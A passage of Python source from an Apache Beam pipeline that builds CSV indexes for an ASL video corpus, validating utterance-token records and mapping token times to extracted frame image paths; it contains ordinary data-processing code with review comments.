    fidscs_globals.SCHEMA_COL_NAMES__VOCABULARY_DS,
    d_pl_options
  ) # vocabulary_index_csv_path
def pl__7__write_document_asl_consultant_utterance_token_index_csv(document_asl_consultant_utterance_token_index_schemad_pcoll, d_pl_options):
  """
  Writes the document/ASL-consultant/utterance/token index to its CSV file.

  Projects the SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS columns out of the schemad
  pcoll (the DocumentFilename/ParticipantName fields are not written),
  de-duplicates and sorts the rows, re-applies a minimal schema, renders CSV
  strings, and hands them to the shared CSV writer.

  Args:
    document_asl_consultant_utterance_token_index_schemad_pcoll: pcoll of
      beam.Row with DocumentID, ASLConsultantID, UtteranceSequence,
      TokenSequence, StartTime, EndTime, TokenID, Field, and FieldValue
      fields (plus DocumentFilename/ParticipantName, which are dropped here).
    d_pl_options: pipeline-options dict forwarded to the CSV writer.

  Returns:
    The result of beam__common.pl__X__write_pcoll_to_csv
    (the utterance-token index CSV path).
  """
  distinct_token_rows = (
    document_asl_consultant_utterance_token_index_schemad_pcoll
    | "Beam PL: extract SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS columns from document_asl_consultant_utterance_token_index_schemad_pcoll" >> beam.Map(
        lambda schemad_row: (
          # column order follows SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS
          schemad_row.DocumentID,
          schemad_row.ASLConsultantID,
          schemad_row.UtteranceSequence,
          schemad_row.TokenSequence,
          schemad_row.StartTime,
          schemad_row.EndTime,
          schemad_row.TokenID,
          schemad_row.Field,
          schemad_row.FieldValue,
        )
      )
    | "Beam PL: select distinct document_asl_consultant_utterance_token_index rows" >> beam.Distinct()
  )
  sorted_token_rows = beam__common.pl__X__sort_pcoll(
    distinct_token_rows,
    pcoll_label="document_asl_consultant_utterance_token_index"
  )
  token_csv_rows = (
    sorted_token_rows
    | "Beam PL: apply minimal schema to create final document_asl_consultant_utterance_token_index_schemad_pcoll of distinct rows" >> beam.Map(
        lambda token_tpl: beam.Row(
          DocumentID=int(token_tpl[0]),
          ASLConsultantID=int(token_tpl[1]),
          UtteranceSequence=int(token_tpl[2]),
          TokenSequence=int(token_tpl[3]),
          StartTime=int(token_tpl[4]),
          EndTime=int(token_tpl[5]),
          TokenID=int(token_tpl[6]),
          Field=str(token_tpl[7]),
          FieldValue=str(token_tpl[8]),
        )
      )
    | beam.Map(lambda schemad_csv_row: beam__common.beam_row_to_csv_string(schemad_csv_row))
  )
  return beam__common.pl__X__write_pcoll_to_csv(
    token_csv_rows,
    "DOCUMENT-ASLCONSULTANT-UTTERANCE-TOKEN-INDEX",
    fidscs_globals.UTTERANCE_TOKEN_DS_FNAME,
    fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_TOKEN_DS,
    d_pl_options
  ) # document_asl_consultant_utterance_token_index_csv_path
def validate_preprocess_document_asl_consultant__to__target_video_utterance_token_map_tpl(document_asl_consultant__to__target_video_utterance_token_map_tpl, d_pl_options):
  """
  Validate one grouped (corpus document, ASL consultant) record and explode it
  into per-(utterance token, target video) tuples, reconciling each token's
  time interval to frame indexes of the frame images already extracted to disk.

  document_asl_consultant__to__target_video_utterance_token_map_tpl:
    (
      (<corpus doc id>, <asl consultant id>), # key
      {
        'target_video_map': [(<target video fname>, <camera perspective>)], # there may be up to three (corresponding to camera perspective)
        'utterance_token_map': [(<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)] # there will be many (corresponding to each utterance)
      }
    )

  d_pl_options: pipeline-options dict forwarded to the fileio path/dir helpers.

  Returns:
    list of validated tuples:
      (corpus_doc_id, asl_consultant_id, target_video_fname, camera_perspective,
       utterance_seq_id, token_seq_id, token_id, token_start_time, token_end_time,
       token_start_frame, token_end_frame, frame_seq_paths, n_existing_frame_images)
    On a fatal validation failure the (unmodified) input tuple is returned
    instead, after printing a fatal-error message, so the caller can inspect it.

  NOTE(review): a later one-argument definition of this same function exists in
  this module and shadows this one at import time -- confirm which is intended.
  """
  validated_results = []

  key = document_asl_consultant__to__target_video_utterance_token_map_tpl[0]
  corpus_doc_id = key[0]
  if corpus_doc_id is None or not isinstance(corpus_doc_id, int) or corpus_doc_id<0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} corpus doc id is invalid: {corpus_doc_id}")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl
  asl_consultant_id = key[1]
  if asl_consultant_id is None or not isinstance(asl_consultant_id, int) or asl_consultant_id<0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} asl consultant id is invalid: {asl_consultant_id}")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl

  target_video_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['target_video_map']
  if len(target_video_map)==0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} target_video_map is empty!")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl
  utterance_token_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['utterance_token_map']
  if len(utterance_token_map)==0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} utterance_token_map is empty!")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl

  for i, utterance_token_map_instance in enumerate(utterance_token_map):
    # utterance_token_map_instance: (<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)
    _utterance_seq_id = utterance_token_map_instance[0]
    if _utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] utterance_seq_id is invalid: {_utterance_seq_id}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_seq_id = utterance_token_map_instance[1]
    if _token_seq_id is None or not isinstance(_token_seq_id, int) or _token_seq_id<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_seq_id is invalid: {_token_seq_id}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_id = utterance_token_map_instance[2]
    if _token_id is None or not isinstance(_token_id, int) or _token_id<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_id is invalid: {_token_id}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_start_time = utterance_token_map_instance[3]
    if _token_start_time is None or not isinstance(_token_start_time, int) or _token_start_time<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_start_time is invalid: {_token_start_time}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_end_time = utterance_token_map_instance[4]
    if _token_end_time is None or not isinstance(_token_end_time, int) or _token_end_time<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_end_time is invalid: {_token_end_time}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl

    for j, target_video_map_instance in enumerate(target_video_map):
      # target_video_map_instance: (<target video fname>, <camera perspective>)
      _target_video_fname = target_video_map_instance[0]
      if _target_video_fname is None or len(_target_video_fname)==0:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname is invalid: {_target_video_fname}")
        return document_asl_consultant__to__target_video_utterance_token_map_tpl

      target_video_frames_dir = fileio.path_join(fidscs_globals.STICHED_VIDEO_FRAMES_DIR, _target_video_fname.split('.')[0])
      # -1 means the frames dir does not exist (as opposed to existing but being empty)
      _n_existing_frame_images = -1 if not fileio.dir_path_exists(target_video_frames_dir, d_pl_options)[0] else len(fileio.list_dir(target_video_frames_dir, d_pl_options))

      _token_end_frame = _token_start_frame = -1
      frame_seq_paths = []
      if _n_existing_frame_images > 0:
        # map the token's [start, end] time (in ms) to frame indexes at fidscs_globals.FPS
        _token_start_frame = int(round(_token_start_time/1000.0*fidscs_globals.FPS))
        _token_end_frame = int(round(_token_end_time/1000.0*fidscs_globals.FPS))+1
        n_frames = _token_end_frame-_token_start_frame
        last_frame_idx = (_n_existing_frame_images-1)
        if _token_start_frame > last_frame_idx:
          # requested window starts past the last extracted frame:
          # readjust bounds from last_frame_idx going backwards, preserving window size
          _token_start_frame = last_frame_idx-(n_frames-1)
          _token_end_frame = last_frame_idx
        else:
          if _token_end_frame > last_frame_idx:
            # window end overruns the extracted frames: take all that is available to the end
            _token_end_frame = last_frame_idx
        if _token_start_frame <= last_frame_idx and _token_end_frame <= last_frame_idx:
          for frame_idx in range(_token_start_frame, _token_end_frame+1):
            frame_path = fileio.path_join(target_video_frames_dir, f"{frame_idx}.jpg")
            if fileio.file_path_exists(frame_path)[0]:
              frame_seq_paths.append(frame_path)
        else:
          print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname}: failed to reconcile invalid requested frame bounds {(_token_start_frame, _token_end_frame)} (valid bounds are: {(0, last_frame_idx)})")
      else:
        # BUGFIX: the original warning here interpolated last_frame_idx, which is
        # only bound in the _n_existing_frame_images > 0 branch -- it would raise
        # NameError on first occurrence (or print a stale value from a previous
        # iteration). Report the actual condition (no extracted frames) instead.
        if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
          print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} has no existing frame images (_n_existing_frame_images=={_n_existing_frame_images}); skipping frame-bounds reconciliation")

      _camera_perspective = target_video_map_instance[1]
      if _camera_perspective is None or not isinstance(_camera_perspective, int) or _camera_perspective<0:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] camera_perspective is invalid: {_camera_perspective}")
        return document_asl_consultant__to__target_video_utterance_token_map_tpl

      validated_results.append(
        (
          corpus_doc_id,
          asl_consultant_id,
          _target_video_fname,
          _camera_perspective,
          _utterance_seq_id,
          _token_seq_id,
          _token_id,
          _token_start_time,
          _token_end_time,
          _token_start_frame,
          _token_end_frame,
          frame_seq_paths,
          _n_existing_frame_images
        )
      )

  return validated_results
def get_target_video_frame_paths(document_asl_consultant_target_video_index_schemad_pcoll_row, d_pl_options):
  """
  Collect the sorted frame-image paths for one target video.

  document_asl_consultant_target_video_index_schemad_pcoll_row:
    beam.Row(
      DocumentID=int(...),
      DocumentFileName=str(...),
      ASLConsultantID=int(...),
      ParticipantName=str(...),
      CameraPerspective=int(...),
      TargetVideoFilename=str(...)
    )

  Returns a one-element list:
    [((DocumentID, ASLConsultantID, CameraPerspective),
      (TargetVideoFilename, <sorted list of frame image paths>))]
  The path list is empty when the video's frames directory does not exist.
  """
  row = document_asl_consultant_target_video_index_schemad_pcoll_row
  frames_root = d_pl_options[fidscs_globals.OPT_NAME_STITCHED_VIDEO_FRAMES_DIR]
  # frames for a video live in a subdir named after the video file (sans extension)
  video_frames_dir = fileio.path_join(frames_root, row.TargetVideoFilename.split('.')[0])

  frame_paths = []
  if fileio.dir_path_exists(video_frames_dir, d_pl_options)[0]:
    dir_entries = fileio.list_dir(video_frames_dir, d_pl_options, exclude_subdir=True)
    if type(FileSystems.get_filesystem(video_frames_dir)) == GCSFileSystem:
      # GCS branch uses listing entries as-is (presumably already full paths --
      # mirrors the original behavior), keeping only the .jpg frame images
      frame_paths = [entry for entry in dir_entries if entry.endswith(".jpg")]
    else:
      # non-GCS listings are joined back onto the frames dir
      frame_paths = [fileio.path_join(video_frames_dir, entry) for entry in dir_entries]
    # order numerically by the integer frame index encoded in the filename stem
    frame_paths.sort(
      key=lambda frame_path: int(frame_path.split(os.path.sep)[-1].split('.')[0])
    )

  return [(
    (row.DocumentID, row.ASLConsultantID, row.CameraPerspective),
    (row.TargetVideoFilename, frame_paths)
  )]
class TargetVideoFramePathGetter(beam__common.PipelinePcollElementProcessor):
  """Element processor exposing get_target_video_frame_paths to beam.ParDo."""
  def __init__(self, d_pl_options):
    # Delegate per-element processing to get_target_video_frame_paths,
    # forwarding the pipeline-options dict via kargs; return_result=True
    # propagates its return value (a one-element list) downstream.
    super(TargetVideoFramePathGetter, self).__init__(
      fn_pcoll_element_processor=get_target_video_frame_paths,
      kargs={'d_pl_options':d_pl_options},
      return_result=True
    )
def target_video_frame_image_to_bytes(document_asl_consultant_target_video_index_schemad_pcoll_row_tpl):
  """
  Repackage one target-video frame-index tuple, passing the frame path through
  unchanged (reading/encoding the image to JPEG bytes is currently disabled).

  document_asl_consultant_target_video_index_schemad_pcoll_row_tpl:
    ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))

  Returns the same key paired with (filename, frame seq id, frame path).
  """
  (corpus_doc_id, asl_consultant_id, camera_perspective), \
    (target_video_fname, frame_seq_id, frame_path) = document_asl_consultant_target_video_index_schemad_pcoll_row_tpl
  return (
    (corpus_doc_id, asl_consultant_id, camera_perspective),
    (target_video_fname, frame_seq_id, frame_path)
  )
def pl__7__create_document_asl_consultant_target_video_frame_index_schemad_pcoll(document_asl_consultant_target_video_index_schemad_pcoll, d_pl_options):
  """
  Build the target-video frame index: list each target video's extracted frame
  image paths, explode to one element per frame, de-dupe, sort, and apply the
  final beam.Row schema.

  document_asl_consultant_target_video_index_schemad_pcoll:
    beam.Row(
      # SCHEMA_COL_NAMES__VIDEO_DS = [
      #   'DocumentID',
      #   'ASLConsultantID',
      #   'CameraPerspective',
      #   'TargetVideoFilename'
      # ]
      DocumentID=int(...),
      DocumentFileName=str(...),
      ASLConsultantID=int(...),
      ParticipantName=str(...),
      CameraPerspective=int(...),
      TargetVideoFilename=str(...)
    )

  Returns a schemad pcoll of beam.Row with fields:
    DocumentID, ASLConsultantID, CameraPerspective,
    TargetVideoFilename, FrameSequence, FramePath
  """
  document_asl_consultant_target_video_frame_index_pcoll = (
    document_asl_consultant_target_video_index_schemad_pcoll
    | "Beam PL: extract ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, listof(<target video frame path>))) "
      "from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.ParDo(TargetVideoFramePathGetter(d_pl_options))
    | "Beam PL: filter out ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, listof(<target video frame path>))) with empty listof(<target video frame path>)" >> beam.Filter(
        # BUGFIX: test the frame-path list itself (element [1][1]); the original
        # tested len(element[1]), which is always 2 (the (filename, path-list)
        # tuple), so the filter never removed anything
        lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl: len(document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[1][1])>0
      )
    | "Beam PL: 'explode' to ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))" >> beam.FlatMap(
        lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl: [
          (
            (
              document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[0][0], # <corpus doc id>
              document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[0][1], # <asl consultant id>
              document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[0][2]  # <camera perspective>
            ),
            (
              document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[1][0], # <target video filename>
              target_video_frame_seq_id,
              target_video_frame_path
            )
          ) for target_video_frame_seq_id, target_video_frame_path in enumerate(document_asl_consultant_target_video_frame_index_schemad_pcoll_row_tpl[1][1])
        ]
      )
    | "Beam PL: select distict ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))" >> beam.Distinct()
    # debug
    # | "Beam PL: print document_asl_consultant_target_video_frame_index_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_frame_index_pcoll entry"))
  )
  sorted_document_asl_consultant_target_video_frame_index_pcoll = beam__common.pl__X__sort_pcoll(
    document_asl_consultant_target_video_frame_index_pcoll,
    pcoll_label="document_asl_consultant_target_video_frame_index_pcoll"
  )
  document_asl_consultant_target_video_frame_index_schemad_pcoll = (
    sorted_document_asl_consultant_target_video_frame_index_pcoll # rows of ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))
    | "Beam PL: read target video frame to tensor" >> beam.Map(target_video_frame_image_to_bytes)
    # the above passes the frame path through unchanged (reading/encoding JPEG
    # bytes is currently disabled in target_video_frame_image_to_bytes),
    # yielding tuples of the form:
    #   ((<corpus doc id>, <asl consultant id>, <camera perspective>), (<target video filename>, <target video frame seq id>, <target video frame path>))
    | "Beam PL: apply schema to create final document_asl_consultant_target_video_frame_index_schemad_pcoll" >> beam.Map(
        lambda sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl: beam.Row(
          DocumentID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][0]),
          ASLConsultantID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][1]),
          CameraPerspective=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][2]),
          TargetVideoFilename=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][0]),
          FrameSequence=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][1]),
          FramePath=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][2])
        )
      )
    # debug
    # | "Beam PL: print document_asl_consultant_target_video_frame_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_frame_index_schemad_pcoll entry"))
  )
  return document_asl_consultant_target_video_frame_index_schemad_pcoll
def pl__8__write_document_asl_consultant_target_video_frame_index_schemad_pcoll(document_asl_consultant_target_video_frame_index_schemad_pcoll, d_pl_options):
  """
  Serialize the target-video frame-index rows to CSV strings and write them
  out via the common CSV writer.

  Returns the result of beam__common.pl__X__write_pcoll_to_csv (the csv path
  pcoll for DOCUMENT-ASLCONSULTANT-TARGETVIDEO-FRAME-INDEX).
  """
  csv_string_rows_pcoll = (
    document_asl_consultant_target_video_frame_index_schemad_pcoll
    | beam.Map(beam__common.beam_row_to_csv_string)
  )
  return beam__common.pl__X__write_pcoll_to_csv(
    csv_string_rows_pcoll,
    "DOCUMENT-ASLCONSULTANT-TARGETVIDEO-FRAME-INDEX",
    fidscs_globals.VIDEO_FRAME_DS_FNAME,
    fidscs_globals.SCHEMA_COL_NAMES__VIDEO_FRAME_DS,
    d_pl_options
  )
def validate_preprocess_document_asl_consultant__to__target_video_utterance_token_map_tpl(document_asl_consultant__to__target_video_utterance_token_map_tpl):
  """
  Validate one grouped (corpus document, ASL consultant) record and explode it
  into per-(utterance token, target video) tuples, reconciling each token's
  time interval to frame indexes of the frame images already extracted to disk.

  document_asl_consultant__to__target_video_utterance_token_map_tpl:
    (
      (<corpus doc id>, <asl consultant id>), # key
      {
        'target_video_map': [(<target video fname>, <camera perspective>)], # there may be up to three (corresponding to camera perspective)
        'utterance_token_map': [(<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)] # there will be many (corresponding to each utterance)
      }
    )

  Returns:
    list of validated tuples:
      (corpus_doc_id, asl_consultant_id, target_video_fname, camera_perspective,
       utterance_seq_id, token_seq_id, token_id, token_start_time, token_end_time,
       token_start_frame, token_end_frame, frame_seq_paths, n_existing_frame_images)
    On a fatal validation failure the (unmodified) input tuple is returned
    instead, after printing a fatal-error message, so the caller can inspect it.

  NOTE(review): this one-argument definition duplicates and SHADOWS the earlier
  two-argument (d_pl_options) version of the same name in this module, and it
  calls fileio.dir_path_exists/list_dir WITHOUT d_pl_options (unlike the rest
  of this module) -- confirm which version is intended to be live and whether
  the fileio helpers accept being called without d_pl_options.
  """
  validated_results = []

  key = document_asl_consultant__to__target_video_utterance_token_map_tpl[0]
  corpus_doc_id = key[0]
  if corpus_doc_id is None or not isinstance(corpus_doc_id, int) or corpus_doc_id<0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} corpus doc id is invalid: {corpus_doc_id}")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl
  asl_consultant_id = key[1]
  if asl_consultant_id is None or not isinstance(asl_consultant_id, int) or asl_consultant_id<0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} asl consultant id is invalid: {asl_consultant_id}")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl

  target_video_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['target_video_map']
  if len(target_video_map)==0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} target_video_map is empty!")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl
  utterance_token_map = document_asl_consultant__to__target_video_utterance_token_map_tpl[1]['utterance_token_map']
  if len(utterance_token_map)==0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} {key} utterance_token_map is empty!")
    return document_asl_consultant__to__target_video_utterance_token_map_tpl

  for i, utterance_token_map_instance in enumerate(utterance_token_map):
    # utterance_token_map_instance: (<utterance seq id>, <token seq id>, <token id>, <token start time>, <token end time>)
    _utterance_seq_id = utterance_token_map_instance[0]
    if _utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] utterance_seq_id is invalid: {_utterance_seq_id}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_seq_id = utterance_token_map_instance[1]
    if _token_seq_id is None or not isinstance(_token_seq_id, int) or _token_seq_id<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_seq_id is invalid: {_token_seq_id}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_id = utterance_token_map_instance[2]
    if _token_id is None or not isinstance(_token_id, int) or _token_id<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_id is invalid: {_token_id}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_start_time = utterance_token_map_instance[3]
    if _token_start_time is None or not isinstance(_token_start_time, int) or _token_start_time<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_start_time is invalid: {_token_start_time}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl
    _token_end_time = utterance_token_map_instance[4]
    if _token_end_time is None or not isinstance(_token_end_time, int) or _token_end_time<0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] token_end_time is invalid: {_token_end_time}")
      return document_asl_consultant__to__target_video_utterance_token_map_tpl

    for j, target_video_map_instance in enumerate(target_video_map):
      # target_video_map_instance: (<target video fname>, <camera perspective>)
      _target_video_fname = target_video_map_instance[0]
      if _target_video_fname is None or len(_target_video_fname)==0:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname is invalid: {_target_video_fname}")
        return document_asl_consultant__to__target_video_utterance_token_map_tpl

      target_video_frames_dir = fileio.path_join(fidscs_globals.STICHED_VIDEO_FRAMES_DIR, _target_video_fname.split('.')[0])
      # -1 means the frames dir does not exist (as opposed to existing but being empty)
      _n_existing_frame_images = -1 if not fileio.dir_path_exists(target_video_frames_dir)[0] else len(fileio.list_dir(target_video_frames_dir))

      _token_end_frame = _token_start_frame = -1
      frame_seq_paths = []
      if _n_existing_frame_images > 0:
        # map the token's [start, end] time (in ms) to frame indexes at fidscs_globals.FPS
        _token_start_frame = int(round(_token_start_time/1000.0*fidscs_globals.FPS))
        _token_end_frame = int(round(_token_end_time/1000.0*fidscs_globals.FPS))+1
        n_frames = _token_end_frame-_token_start_frame
        last_frame_idx = (_n_existing_frame_images-1)
        if _token_start_frame > last_frame_idx:
          # requested window starts past the last extracted frame:
          # readjust bounds from last_frame_idx going backwards, preserving window size
          _token_start_frame = last_frame_idx-(n_frames-1)
          _token_end_frame = last_frame_idx
        else:
          if _token_end_frame > last_frame_idx:
            # window end overruns the extracted frames: take all that is available to the end
            _token_end_frame = last_frame_idx
        if _token_start_frame <= last_frame_idx and _token_end_frame <= last_frame_idx:
          for frame_idx in range(_token_start_frame, _token_end_frame+1):
            frame_path = fileio.path_join(target_video_frames_dir, f"{frame_idx}.jpg")
            if fileio.file_path_exists(frame_path)[0]:
              frame_seq_paths.append(frame_path)
        else:
          print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname}: failed to reconcile invalid requested frame bounds {(_token_start_frame, _token_end_frame)} (valid bounds are: {(0, last_frame_idx)})")
      else:
        # BUGFIX: the original warning here interpolated last_frame_idx, which is
        # only bound in the _n_existing_frame_images > 0 branch -- it would raise
        # NameError on first occurrence (or print a stale value from a previous
        # iteration). Report the actual condition (no extracted frames) instead.
        if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
          print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} has no existing frame images (_n_existing_frame_images=={_n_existing_frame_images}); skipping frame-bounds reconciliation")

      _camera_perspective = target_video_map_instance[1]
      if _camera_perspective is None or not isinstance(_camera_perspective, int) or _camera_perspective<0:
        print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] camera_perspective is invalid: {_camera_perspective}")
        return document_asl_consultant__to__target_video_utterance_token_map_tpl

      validated_results.append(
        (
          corpus_doc_id,
          asl_consultant_id,
          _target_video_fname,
          _camera_perspective,
          _utterance_seq_id,
          _token_seq_id,
          _token_id,
          _token_start_time,
          _token_end_time,
          _token_start_frame,
          _token_end_frame,
          frame_seq_paths,
          _n_existing_frame_images
        )
      )

  return validated_results
def pl__8__create_document_asl_consultant_utterance_token_frame_index_schemad_pcoll(
  document_asl_consultant_utterance_token_index_schemad_pcoll,
  document_asl_consultant_target_video_index_schemad_pcoll,
  document_asl_consultant_target_video_frame_index_schemad_pcoll,
  d_pl_options
):
  """
  Join the utterance-token index, target-video index, and target-video frame
  index into a single schemad pcoll with one row per
  (doc, consultant, camera perspective, target video, utterance, token, frame).

  NOTE(review): d_pl_options is accepted but not referenced in this function's
  body — presumably kept for signature consistency with sibling pl__* stages;
  confirm before removing.

  document_asl_consultant_utterance_token_index_schemad_pcoll:
    beam.Row(
      DocumentID=document_asl_consultant_utterance_token_tpl[0],
      DocumentFilename=document_asl_consultant_utterance_token_tpl[1],
      ASLConsultantID=document_asl_consultant_utterance_token_tpl[2],
      ParticipantName=document_asl_consultant_utterance_token_tpl[3],
      UtteranceSequence=document_asl_consultant_utterance_token_tpl[4],
      TokenSequence=document_asl_consultant_utterance_token_tpl[7],
      StartTime=document_asl_consultant_utterance_token_tpl[8],
      EndTime=document_asl_consultant_utterance_token_tpl[9],
      TokenID=document_asl_consultant_utterance_token_tpl[5],
      Field='', # blank for now
      FieldValue='' # blank for now
    )
  document_asl_consultant_target_video_index_schemad_pcoll:
    beam.Row(
      # SCHEMA_COL_NAMES__VIDEO_DS = [
      #   'DocumentID',
      #   'ASLConsultantID',
      #   'CameraPerspective',
      #   'TargetVideoFilename'
      # ]
      DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
      DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
      ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
      ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
      UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
      CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
      TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
    )
  document_asl_consultant_target_video_frame_index_schemad_pcoll
    beam.Row(
      DocumentID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][0]),
      ASLConsultantID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][1]),
      CameraPerspective=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][2]),
      TargetVideoFilename=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][0]),
      FrameSequence=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][1]),
      FramePath=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][2]),
      UtteranceSequence
    )
  return schemad pcoll using:
    SCHEMA_COL_NAMES__UTTERANCE_TOKEN_FRAME_DS = [
      'DocumentID',
      'ASLConsultantID',
      'CameraPerspective',
      'TargetVideoFilename',
      'UtteranceSequence',
      'TokenSequence',
      'FrameSequence',
      'TokenID'
    ]
  """
  # Stage 1: key the target-video index by (doc, consultant, utterance) so it can
  # later be co-grouped with the token map; Distinct() collapses duplicate rows.
  doc_consultant_utterance__to__target_video_map = (
    document_asl_consultant_target_video_index_schemad_pcoll
    | "Beam PL: extract ((<doc id>, <asl consultant id>, <utterance seq id>), (<target vid fname>, <camera perspective>))" >> beam.Map(
        lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
          (
            document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
            document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
            document_asl_consultant_target_video_index_schemad_pcoll_row.UtteranceSequence
          ),
          (
            document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename,
